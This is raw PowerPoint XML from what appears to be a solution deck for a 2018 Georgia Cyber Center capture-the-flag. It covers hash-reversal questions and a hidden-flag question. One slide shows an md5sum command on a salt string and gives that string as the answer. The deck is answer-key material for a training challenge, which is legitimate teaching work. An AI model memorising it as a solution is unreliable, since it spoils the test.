                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Hrm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>, in blue above I see what sounds like a salt value.  Could he be doing something silly like just doing a md5 hash of the salt value each time?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>echo -n "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ThisIsTheSalties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>" | md5sum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>774759259d4c17d319cfee68ef57949f  -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>Yes he could.  So we know the answer is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
                <a:ea typeface="Tahoma" pitchFamily="2"/>
              </a:rPr>
              <a:t>ThisIsTheSalties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34"/>
              <a:ea typeface="Tahoma" pitchFamily="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4385</TotalTime>
  <Words>1975</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>181</Paragraphs>
  <Slides>24</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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier 10 Pitch</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Franklin Gothic Heavy</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>Liberation Serif</vt:lpstr>
      <vt:lpstr>Lohit Devanagari</vt:lpstr>
      <vt:lpstr>StarSymbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>2018.11.06 Georgia Cyber Center CTF</vt:lpstr>
      <vt:lpstr>Question 1</vt:lpstr>
      <vt:lpstr>1. Reverse the hash created by hash_password1</vt:lpstr>
      <vt:lpstr>Question 2</vt:lpstr>
      <vt:lpstr>2. Reverse the hash created by hash_password2</vt:lpstr>
      <vt:lpstr>2. Reverse the hash created by hash_password2</vt:lpstr>
      <vt:lpstr>Question 3</vt:lpstr>
      <vt:lpstr>3. Find the input resulting in the hash output by hash_password3</vt:lpstr>
      <vt:lpstr>3. Find the input resulting in the hash output by hash_password3</vt:lpstr>
      <vt:lpstr>Question 4</vt:lpstr>
      <vt:lpstr>4. Find the input resulting in the hash output by hash_password4</vt:lpstr>
      <vt:lpstr>4. Find the input resulting in the hash output by hash_password4</vt:lpstr>
      <vt:lpstr>Question 5</vt:lpstr>
      <vt:lpstr>5. Find the input resulting in the hash output by hash_password5</vt:lpstr>
      <vt:lpstr>5. Find the input resulting in the hash output by hash_password5</vt:lpstr>
      <vt:lpstr>Question 6</vt:lpstr>
      <vt:lpstr>6. Where is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?</vt:lpstr>
      <vt:lpstr>6. What is the hidden flag?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Sartory, Kelsey</dc:creator>
  <cp:lastModifiedBy>Hite, Brett</cp:lastModifiedBy>
  <cp:revision>84</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-06T17:30:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-30T16:59:34Z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15.0023</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r8>8</vt:r8>
  </property>
</Properties>
</file>